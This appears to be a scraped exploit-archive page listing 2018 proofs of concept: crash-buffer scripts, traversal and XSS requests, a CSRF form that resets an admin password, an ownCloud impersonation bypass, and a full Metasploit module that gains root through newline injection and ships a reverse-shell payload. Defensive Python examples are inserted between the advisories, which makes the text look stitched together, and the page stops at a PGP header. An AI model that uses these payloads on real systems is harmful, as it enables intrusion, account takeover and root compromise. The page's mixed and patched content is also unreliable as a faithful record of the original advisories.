
Easy PhotoResQ 1.0 Denial Of Service


Easy PhotoResQ version 1.0 suffers from a denial of service vulnerability.


MD5 | 815f448928095fd479d7b215c573ea48

# Exploit Title: Easy PhotoResQ 1.0 - Denial Of Service (PoC)
# Author: Gionathan "John" Reale
# Discovery Date: 2018-08-29
# Homepage: https://www.hdtune.com/
# Software Link: https://www.hdtune.com/download.html
# Tested Version: v1.0
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script; it will create a new
# file named "exploit.txt". Copy the content of the new file "exploit.txt".
# Now start the program. Inside the program click "File" > "Options". In the field "Folder / filename" paste the copied content from "exploit.txt".
# Now click "OK" and see a crash!

#!/usr/bin/python

# Write 6000 "A" bytes to exploit.txt; paste this into the "Folder / filename" field.
buffer = "A" * 6000

payload = buffer
try:
    f = open("exploit.txt", "w")
    print("[+] Creating %s bytes evil payload.." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created")



Trillian 6.1 Build 16 Denial Of Service


Trillian version 6.1 build 16 suffers from a denial of service vulnerability.


MD5 | 337615183bce99670fbfaced47ce87b0

#Exploit Title: Trillian 6.1 Build 16 - "Sign In" Denial of service (PoC)
#Discovery by: Jose Miguel Gonzalez
#Discovery Date: 2018-08-29
#Vendor Homepage: https://www.trillian.im/
#Software Link: https://www.trillian.im/download/
#Tested Version: 6.1 Build 16
#Tested on OS: Windows 10 Single Language x64

#Steps to produce the crash
#1.- Run the python code: trillian.py
#2.- Open trillian.txt and copy content to clipboard
#3.- Open Trillian application
#4.- Paste clipboard on "Username"
#5.- Put "1234" on "Password"
#6.- Sign In
#7.- Crashed

# Write 214 "A" bytes to trillian.txt; paste this into the "Username" field.
mem = "\x41" * 214
f = open("trillian.txt", "w")
f.write(mem)
f.close()


NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 Denial Of Service


NetworkActiv Web Server version 4.0 Pre-Alpha-3.7.2 suffers from a denial of service vulnerability.


MD5 | d8fc1f8d3f1d5316c95e05511dd62150

#Exploit Title: NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-08-30
#Vendor Homepage: https://www.networkactiv.com/WebServer.html
#Software Link: https://www.networkactiv.com/Dev/
#Tested Version: 4.0 Pre-Alpha-3.7.2
#Tested on: Windows 10 Single Language x64

#Steps to produce the crash:
#1.- Run python code: NetworkActiv_Web_Server_4.0_PA_3.7.2.py
#2.- Open Network.txt and copy content to clipboard
#3.- Open NetworkActiv Web Server 4.0
#4.- Select Security options
#5.- Select "Set username" and Paste ClipBoard on "New Value"
#6.- Select "Set password" and Put "1234" on "New Value"
#7.- Crashed

# Write 11250 "A" bytes to Network.txt; paste this into the "Set username" value.
cod = "\x41" * 11250

f = open('Network.txt', 'w')
f.write(cod)
f.close()



Nord VPN 6.14.31 Denial Of Service


Nord VPN version 6.14.31 suffers from a denial of service vulnerability.


MD5 | a27f9ed6b1e476b91335ea7e9a34320b

# Exploit Title: Nord VPN <= 6.14.31 - Denial of Service (PoC)
# Exploit Author : L0RD (borna nematzadeh)
# Contact: borna.nematzadeh123@gmail.com
# Date: 2018-08-30
# Vendor Homepage : https://nordvpn.com
# Software link: https://nordvpn.com/download/
# Version: <= 6.14.31
# Tested on: Windows 10
# CVE: N/A

# Steps to reproduce:
# 1) Run the python exploit code and open "nord.txt" file
# 2) Copy the content of file
# 3) Open Nord vpn
# 4) Put anything (like test@test.com) into username field and paste content of "nord.txt" into password
# 5) Crash!

#!/usr/bin/python

# Write 100000 "A" bytes to nord.txt; paste this into the password field.
buffer = "\x41" * 100000
f = open("nord.txt", "w")
f.write(buffer)
f.close()
print("File created")


Cybrotech CyBroHttpServer 1.0.3 Directory Traversal


Cybrotech CyBroHttpServer version 1.0.3 suffers from a directory traversal vulnerability.


MD5 | 9191949abbabdbfa1138d47030dde2bf

# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
# Date: 2018-08-29
# Exploit Author: Emre Övünç
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows
# CVE: CVE-2018-16133

# PoC
https://<host>\..\..\..\..\Windows\win.ini

# CVE-2018-16133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133
https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
https://emreovunc.com/blog/en/CyBroHttpServer-v.1.0.3-Directory-Traversal-3.png

GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
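Server-side resolution that keeps a request target inside the document root, as an added Python example (not CyBroHttpServer's code); the document root is an assumed path, and the sample request lines are constructed from the request shown above:

```python
import re
from pathlib import PureWindowsPath
from urllib.parse import unquote

# Assumed document root for a Windows-hosted server such as CyBroHttpServer.
WEB_ROOT = PureWindowsPath(r"C:\CyBroHttpServer\www")


def resolve_request_target(target, root=WEB_ROOT):
    """Map an HTTP request-target to a file under root, or return None if it
    would escape the root. Windows treats both '\\' and '/' as separators, so
    both are split on. '..' is resolved segment by segment instead of with
    normpath, because posixpath.normpath('/../x') silently yields '/x'."""
    path = unquote(target.split("?", 1)[0])      # drop the query, decode once
    stack = []
    for seg in re.split(r"[\\/]+", path):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:
                return None                      # tried to climb above root
            stack.pop()
            continue
        if ":" in seg or "\0" in seg:
            return None                          # drive letter or NUL smuggling
        stack.append(seg)
    return root.joinpath(*stack)


def flag_traversal_request(request_line):
    """Detection helper for access logs: True when the request-target of a
    line such as 'GET \\..\\..\\Windows\\win.ini HTTP/1.1' escapes the root."""
    parts = request_line.split(" ", 2)
    if len(parts) < 2:
        return False
    return resolve_request_target(parts[1]) is None


# Constructed samples: the advisory's request line plus benign and encoded variants.
SAMPLE_REQUEST_LINES = [
    r"GET \..\..\..\..\Windows\win.ini HTTP/1.1",
    "GET /index.html HTTP/1.1",
    "GET /docs/../index.html HTTP/1.1",
    "GET /..%5C..%5CWindows%5Cwin.ini HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUEST_LINES:
        print(("BLOCK " if flag_traversal_request(line) else "serve ") + line)
```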


Cybrotech CyBroHttpServer 1.0.3 Cross Site Scripting


Cybrotech CyBroHttpServer version 1.0.3 suffers from a cross site scripting vulnerability.


MD5 | 514b24e484e6f948a886834e40fac23e

# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting
# Date: 2018-08-29
# Exploit Author: Emre Övünç
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows
# CVE-2018-16134

# PoC
http://<host>/<script>alert('xss');</script>

GET <script>alert('xss');</script> HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1



WordPress Quizlord 2.0 Cross Site Scripting


WordPress Quizlord plugin version 2.0 suffers from a cross site scripting vulnerability.


MD5 | f3d6f31c0ae38f1f1fa75bdfeb90f7ed

# Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting
# Date: 2018-08-29
# Exploit Author: Renos Nikolaou
# Software Link: https://downloads.wordpress.org/plugin/quizlord.zip
# Version: 2.0
# Tested on: Kali Linux
# CVE: N/A
# Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities
# because it fails to properly sanitize user-supplied input.

# PoC - Stored XSS - Parameter: title
# 1) Log in as a user who has access to the Quizlord plugin.
# 2) Quizlord --> Add a Quiz.
# 3) In the title type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save.
# (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"])
# 4) Copy the shortcode [quizlord id="#"] into any post or page and visit it in a browser.

# Post Request (Step 3):

POST /wordpress/wp-admin/admin.php HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord
Cookie: wordpress_295cdc576d46a74a4105db5d33654g45
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save


WordPress Jibu Pro 1.7 Cross Site Scripting


WordPress Jibu Pro plugin version 1.7 suffers from a cross site scripting vulnerability.


MD5 | b641a7402e57dbb0f939b9e309f95e3d

# Exploit Title: WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting
# Google Dork: inurl:"/wp-content/plugins/jibu-pro"
# Date: 2018-08-29
# Exploit Author: Renos Nikolaou
# Software Link: https://downloads.wordpress.org/plugin/jibu-pro.1.7.zip
# Version: 1.7
# Tested on: Kali Linux
# CVE: N/A
# Description: Jibu Pro is prone to Stored Cross Site Scripting vulnerabilities
# because it fails to properly sanitize user-supplied input.

# PoC - Stored XSS - Parameter: name
# 1) Log in as a user who has access to the Jibu Pro plugin.
# 2) Jibu-Pro --> Create Quiz.
# 3) In the Quiz Name type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save.
# (The first pop-up will appear. Also keep note of the shortcode, similar to: [Test Number])
# 4) Click Create New Questions, fill the fields and click Save.
# 5) Copy the shortcode [Test Number] into any post or page and visit it in a browser.

# Post Request (Step 3):

POST /wordpress/wp-content/plugins/jibu-pro/quiz_action.php HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://domain.com/wordpress/wp-admin/edit.php?page=jibu-pro%2Fquiz_form.php&action=new
Cookie: wordpress_295cdc576d46a74a4105db5d33654g45
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 512

name=poc"><script>alert(1)</script>&description=poc&passedMark=3&no_of_ques=3&content=Congrats&_wpnonce=c2414882de&_wp_http_referer=/wordpress/wp-admin/edit.php?page=jibu-pro/quiz_form.php&action=new&action=new&quiz=&user_ID=1&submit=Save



ownCloud 0.1.2 User Impersonation Authorization Bypass


ownCloud version 0.1.2 suffers from a user impersonation authorization bypass vulnerability.


MD5 | 6bc5693824d5901a03d83caf7dbc9ee2

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: ownCloud Impersonate
# Vendor: ownCloud
# CSNC ID: CSNC-2018-015
# CVE ID: N/A
# Subject: Authorization bypass
# Risk: High
# Effect: Remotely exploitable
# Author: Thierry Viaccoz <thierry.viaccoz@compass-security.com>
# Date: 29.08.2018
#
#############################################################


Introduction:
-------------
ownCloud [1] is a suite of client-server software for creating file hosting services and using them. An app called Impersonate [2] was created to allow administrators to impersonate other users.

According to the documentation [3], group admins should only be able to access users of the groups they are administrator of.

Compass Security discovered that it was possible for a group admin to impersonate any user, except global administrators.

This way, group admins have access to data of users of other groups, even though they shouldn't.


Affected:
---------
Vulnerable:
* Version 0.1.2

Not vulnerable:
* Version 0.2.0

No other version was tested, but older versions are believed to be vulnerable too.


Technical Description
---------------------
In order to reproduce the vulnerability, follow the steps below.

Create two groups:
* group1
* group2

Create four users as follows:
* test1; group = group1; group admin = group1
* test2; group = group1; group admin = no group
* test3; group = group2; group admin = group2
* test4; group = group2; group admin = no group

Activate the Impersonate app in Settings > Admin > Apps.

Go to Settings > Admin > Apps > User Authentication, check "Allow group admins to impersonate users from these groups" and add the two groups "group1" and "group2".

Log in with "test1", open the user page and impersonate the user "test2". There, intercept the POST request to /apps/impersonate/user and replace "target=test2" by "target=test3" in the body as shown below.

As a result, the user "test1" will impersonate the user "test3", even though "test1" is only group admin of "group1" and "test3" is not in this group.

Request:
=========
POST /apps/impersonate/user HTTP/1.1
Host: demo.owncloud.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken: [CUT]
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 12
Cookie: [CUT]
Connection: close

target=test3
=========

Response:
=========
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Length: 2
Content-Security-Policy: default-src 'none';manifest-src 'self';script-src 'self''unsafe-eval';style-src 'self''unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self'
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Mar 2018 15:21:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Strict-Transport-Security: max-age=15768000; preload
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: none
X-Xss-Protection: 1; mode=block
Connection: close

[]
=========


Workaround / Fix:
-----------------
Check the authorization consistently so that group admins cannot impersonate users from other groups.
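One way to apply that check, as an added Python model of the /apps/impersonate/user decision (example code, not the Impersonate app's own); the directory, the global-admin rule and the allowed-groups setting are assumptions built from the reproduction steps above:

```python
import json
from urllib.parse import parse_qs

# Constructed directory mirroring the advisory's setup: two groups, a group
# admin plus a plain member in each, and one global admin (assumed).
GROUP_MEMBERS = {"group1": {"test1", "test2"}, "group2": {"test3", "test4"}}
GROUP_ADMIN_OF = {"test1": {"group1"}, "test3": {"group2"}}
GLOBAL_ADMINS = {"admin"}
# The "Allow group admins to impersonate users from these groups" setting.
IMPERSONATE_GROUPS = {"group1", "group2"}


def can_impersonate(actor, target):
    """Authorization rule evaluated on the submitted target. A global admin may
    impersonate anyone except another global admin (assumption made for this
    example); a group admin only members of groups they administer that are
    also enabled in IMPERSONATE_GROUPS."""
    if actor == target or target in GLOBAL_ADMINS:
        return False
    if actor in GLOBAL_ADMINS:
        return True
    admin_groups = GROUP_ADMIN_OF.get(actor, set()) & IMPERSONATE_GROUPS
    return any(target in GROUP_MEMBERS.get(g, set()) for g in admin_groups)


def handle_impersonate(session_user, body):
    """Minimal model of POST /apps/impersonate/user: parse the form body
    (e.g. 'target=test3') and decide on the *submitted* target, never on the
    user the UI happened to show. Returns (HTTP status, JSON body)."""
    target = parse_qs(body).get("target", [""])[0]
    if not target:
        return 400, json.dumps({"message": "missing target"})
    if not can_impersonate(session_user, target):
        return 403, json.dumps({"message": "not allowed to impersonate " + target})
    # A real implementation would switch the session to `target` here.
    return 200, json.dumps([])


if __name__ == "__main__":
    # The advisory's tampered request: test1 (admin of group1) targets test3.
    print(handle_impersonate("test1", "target=test3"))
```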


Timeline:
---------
2018-08-29: Coordinated public disclosure date
2018-04-17: Release of fixed version 0.2.0
2018-03-16: Initial vendor response
2018-03-16: Initial vendor notification
2018-03-15: Discovery by Thierry Viaccoz


References:
-----------
[1] https://owncloud.org/
[2] https://marketplace.owncloud.com/apps/impersonate
[3] https://doc.owncloud.org/server/10.0/admin_manual/issues/impersonate_users.html


Network Manager VPNC Username Privilege Escalation


This Metasploit module exploits an injection vulnerability in the Network Manager VPNC plugin to gain root privileges. This Metasploit module uses a new line injection vulnerability in the configured username for a VPN network connection to inject a `Password helper` configuration directive into the connection configuration. The specified helper is executed by Network Manager as root when the connection is started. Network Manager VPNC versions prior to 1.2.6 are vulnerable. This Metasploit module has been tested successfully with VPNC versions: 1.2.4-4 on Debian 9.0.0 (x64); and 1.1.93-1 on Ubuntu Linux 16.04.4 (x64).


MD5 | 37f40fef98e4c4b4a836d2e93622bc7f

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Network Manager VPNC Username Privilege Escalation',
      'Description'    => %q{
        This module exploits an injection vulnerability in the Network Manager
        VPNC plugin to gain root privileges.

        This module uses a new line injection vulnerability in the configured
        username for a VPN network connection to inject a `Password helper`
        configuration directive into the connection configuration.

        The specified helper is executed by Network Manager as root when the
        connection is started.

        Network Manager VPNC versions prior to 1.2.6 are vulnerable.

        This module has been tested successfully with VPNC versions:
        1.2.4-4 on Debian 9.0.0 (x64); and
        1.1.93-1 on Ubuntu Linux 16.04.4 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Denis Andzakovic', # Discovery and exploit
          'Brendan Coles'     # Metasploit
        ],
      'DisclosureDate' => 'Jul 26 2018',
      'References'     =>
        [
          ['CVE', '2018-10900'],
          ['URL', 'http://seclists.org/oss-sec/2018/q3/51'],
          ['URL', 'https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc'],
          ['URL', 'https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4'],
          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-10900'],
          ['URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html'],
          ['URL', 'https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1'],
          ['URL', 'https://www.debian.org/security/2018/dsa-4253'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1605919'],
          ['URL', 'https://bugzilla.novell.com/show_bug.cgi?id=1101147']
        ],
      'Platform'       => 'linux',
      'Arch'           => [ARCH_X86, ARCH_X64],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultOptions' =>
        {
          'PAYLOAD'     => 'linux/x86/meterpreter/reverse_tcp',
          'WfsDelay'    => 10,
          'PrependFork' => true
        },
      'DefaultTarget'  => 0))
    register_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    cmd_exec "chmod +x '#{path}'"
  end

  def check
    unless command_exists? 'nmcli'
      vprint_error 'Network Manager nmcli utility is not installed'
      return CheckCode::Safe
    end
    vprint_good 'nmcli utility is installed'

    CheckCode::Detected
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    @payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
    payload_path = "#{base_dir}/#{@payload_name}"

    print_status 'Adding VPN connection...'
    vpn_data = []
    vpn_data << '+vpn.data "IKE DH Group = dh2"'
    vpn_data << "+vpn.data 'IPSec ID = #{rand_text_alphanumeric 5..10}'"
    vpn_data << '+vpn.data "IPSec gateway = 127.0.0.1"'
    vpn_data << '+vpn.data "IPSec secret-flags = 4"'
    vpn_data << '+vpn.data "Local Port = 0"'
    vpn_data << '+vpn.data "NAT Traversal Mode = natt"'
    vpn_data << '+vpn.data "Perfect Forward Secrecy = server"'
    vpn_data << '+vpn.data "Vendor = cisco"'
    vpn_data << '+vpn.data "Xauth password-flags = 4"'
    # The newline inside the username value ends that directive and appends a
    # "Password helper" directive pointing at the uploaded payload.
    vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\""
    vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'"
    vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'"
    # Each +vpn.data entry must remain a separate shell word, so join with a space.
    res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join(' ')}"
    if res.include? 'Error'
      fail_with Failure::Unknown, 'Could not create VPN connection'
    end

    res = cmd_exec 'nmcli connection'
    unless res.include? @payload_name
      fail_with Failure::Unknown, 'Could not create VPN connection'
    end

    print_status 'Uploading payload...'
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Starting VPN connection...'
    cmd_exec "nmcli connection up #{@payload_name} & echo "
  end

  def cleanup
    print_status 'Removing VPN connection...'
    res = cmd_exec "nmcli connection delete #{@payload_name}"
    unless res.include? 'successfully deleted'
      print_warning "Could not remove VPN connection #{@payload_name}"
    end
    super
  end
end
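The mechanism the module relies on, shown as an added Python model that is neither the module's nor NetworkManager-vpnc's code: an unchecked writer copies the username verbatim into "Name value" lines, the reader then sees the smuggled directive, and a hardened writer rejects control characters before anything is written. The option list, the reader and the helper path are assumptions.

```python
import re

# Subset of option names vpnc understands (assumed list): the reader matches a
# known name as the line prefix and treats the remainder as the value.
VPNC_OPTIONS = ("IPSec gateway", "IPSec ID", "Xauth username",
                "Xauth password", "Password helper")


def parse_vpnc_config(text):
    """Model of how the privileged side reads the generated configuration:
    one directive per line, longest matching option name wins."""
    directives = []
    for line in text.splitlines():
        for name in sorted(VPNC_OPTIONS, key=len, reverse=True):
            if line.startswith(name):
                directives.append((name, line[len(name):].strip()))
                break
    return directives


def render_unchecked(settings):
    """'Before': every value is copied verbatim into a 'Name value' line."""
    return "".join("%s %s\n" % (name, value) for name, value in settings)


def render_hardened(settings):
    """'After': refuse any value that could end a line or start a new directive.
    CR, LF and other control characters never occur in a legitimate username
    or gateway, so rejecting them loses nothing."""
    for name, value in settings:
        if re.search(r"[\x00-\x1f\x7f]", value):
            raise ValueError("control character in %r: %r" % (name, value))
    return render_unchecked(settings)


def injected_directives(settings):
    """Directives the unchecked writer would hand to the privileged reader that
    the caller never supplied as settings of their own."""
    supplied = {name for name, _ in settings}
    return [d for d in parse_vpnc_config(render_unchecked(settings))
            if d[0] not in supplied]


# Constructed connection settings. The username carries the same kind of
# newline payload the module builds; the helper path is a placeholder.
INJECTED_HELPER = "/tmp/.placeholder-helper"
MALICIOUS = [("IPSec gateway", "127.0.0.1"),
             ("Xauth username", "alice\nPassword helper " + INJECTED_HELPER)]
CLEAN = [("IPSec gateway", "127.0.0.1"), ("Xauth username", "alice")]

if __name__ == "__main__":
    print("unchecked writer leaks:", injected_directives(MALICIOUS))
    try:
        render_hardened(MALICIOUS)
    except ValueError as err:
        print("hardened writer rejects:", err)
```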

Acunetix WVS Reporter 10.0 Denial Of Service


Acunetix WVS Reporter version 10.0 suffers from a denial of service vulnerability.


MD5 | a8b5867f9140ecd760e3bb59d0c07bef

# Exploit Title: Acunetix WVS Reporter 10.0 - Denial of Service (PoC)
# Exploit Author: Ali Alipour
# Date: 2018-08-22
# Vendor Homepage : https://www.acunetix.com/
# Tested on : Windows 10 - 64-bit

# Steps to Reproduce
# Run the python exploit script; it will create a new
# file named "exploit.txt". Copy the text inside "exploit.txt"
# and start the Acunetix WVS Reporter 10.0 program.
# In the new window click "Report Preview" > "Load Report".
# Upload a sample report, then click on the print button.
# Now paste the content of "exploit.txt" into the field "Pages".
# Click "OK" and you will see a crash.

#!/usr/bin/python

# Write 20 "A" bytes to exploit.txt; paste this into the "Pages" field.
buffer = "A" * 20
payload = buffer
try:
    f = open("exploit.txt", "w")
    print("[+] Creating %s bytes evil payload.." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created")


AZORult Stealer 2 Botnet SQL Injection


AZORult Stealer version 2 suffers from a remote SQL injection vulnerability.


MD5 | 57a793d60877ad75ac3176ec2f5fc757

################################################
#Title: AZORult Stealer v2 Botnet - SQL injection
#Credit: Bilal KARDADOU
#URL: https://www.rekings.com/shop/azorult-stealer/
#Product: 'AZORult Stealer v2 Botnet'
#Type: Paid
#Google Dork: N/A
################################################
#
# Description:
# Stealer of stored passwords, cookies, autocomplete from browsers:
# Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge,
# YandexBrowser, Opera, InternetMailRu, ComodoDragon, Amigo, Bromium,
# Chromium, 360Browser, Nichrome, RockMelt, Vivaldi, GoBrowser, Sputnik,
# Kometa, Uran, QIPSurf, Epic, Brave, CocCoc, CentBrowser, 7Star,
# ElementsBrowser, TorBro, Suhba, SaferBrowser, Mustang, Superbird, Chedot,
# Torch, Waterfox, Cyberfox, Comodo IceDragon, PaleMoon
# (Cookies in Netscape format, in the admin panel they are converted into
# JSON)
#
# Stealer of stored passwords:
# Outlook, Thunderbird, Filezilla, WinSCP
# Pidgin, PSI, PSI Plus, Skype, Telegram
# Steam ( ssfn + vdf)
# Anoncoin, Armory, BBQcoin, Bitcoin Core, Bytecoin, Craftcoin, DashCoin,
# Devcoin, Digitalcoin, Electrum, Fastcoin, Feathercoin, Florincoin, Franko,
# Freicoin, GoldCoin, IoCoin, Litecoin, Mincoin, Monero, MultiBit, namecoin,
# NovaCoin, Phoenixcoin, PPCoin, primecoin, ProtoShares, Quarkcoin, Tagcoin,
# Terracoin, Worldcoin, Yacoin, Zetacoin
#
# --Method=GET -p [search]
#
# -u "http://127.0.0.1/index.php?status=0&datefrom=&dateup=&search=a[SQLI]&cookiesearch=&page=reports"
#
# PoC:
# https://prnt.sc/kp4otu
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/
################################################

Vox TG790 ADSL Router Cross Site Scripting


The Vox TG790 ADSL router suffers from a cross site scripting vulnerability.


MD5 | 5ee941c572227032fa21ff2a33527220

# Title: Vox TG790 ADSL Router - Cross-Site Scripting
# Author: Cakes
# Exploit Date: 2018-08-01
# Vendor: Vox Telecom
# Link: https://www.vox.co.za/
# Firmware Version: 6.2.W.1
# CVE: N/A

# Description
# Due to improper user input handling, low privilege users are able to create
# a persistent Cross-Site Scripting attack via the phone book function.

# PoC
POST /cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name= HTTP/1.1
Host: 192.168.1.254
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://192.168.1.254/cgi/b/_voip_/pb/?be=0&l0=2&l1=1&name=
Authorization: Digest username="cakes", realm="SpeedTouch", nonce="0745EHNLF:00-1D-68-52-6C-37:173934:292999", uri="/cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name=", response="ab09b54d4b6369496463eb79cfb4b1c2", qop=auth, nc=0000002a, cnonce="8305e26a71dd0ae2"
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 141

0=10&1=&100=Cakes&101=Cakes&102=123123&103=123123123&104=123123&105=123123&106=<script>altert("TESTER");</script>

# Response
HTTP/1.0 200 OK
Cache-Control: no-cache
Expires: -1
Content-Type: text/html



DamiCMS 6.0.0 Cross Site Request Forgery


DamiCMS version 6.0.0 cross site request forgery proof of concept exploit that changes the administrative password.


MD5 | 6b671483456e26e8a611bc5309ec9bdf

# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)
# Author: Autism_JH
# Date: 2018-08-30
# Vendor Homepage: https://github.com/731276192/damicms
# Software Link: https://github.com/731276192/damicms
# Version: 6.0.0
# CVE: CVE-2018-15844

# Description:
# DamiCMS v6.0.0 allows CSRF to change the administrator account's password.
# After the administrator logs in, opening the PoC page changes the
# administrator account's password to 123123.

# POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="123123" />
<input type="hidden" name="role_id" value="1" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="Submit" value="ASS¡®AY=®šA$?¿®A|”¹" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


CA Unified Infrastructure Management Hardcoded Credentials / Missing Authentication


CA Technologies Support is alerting customers to multiple potential risks with CA Unified Infrastructure Management. Multiple vulnerabilities exist that can allow an attacker, who has access to the network on which CA UIM is running, to run arbitrary CA UIM commands on machines where the CA UIM probes are running. An attacker can also gain access to other machines running CA UIM and access the filesystems of those machines. The first vulnerability has a medium risk rating and concerns a hardcoded secret key, which can allow an attacker to access sensitive information. The second vulnerability has a medium risk rating and concerns a hardcoded passphrase, which can allow an attacker to access sensitive information. The third vulnerability has a high risk rating and concerns a lack of authentication, which can allow a remote attacker to conduct a variety of attacks, including file reading/writing. Affected versions include 8.5.1, 8.5, and 8.4.7.


MD5 | 6e99f3fdbc87760f71a42c271a8fbbfb


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

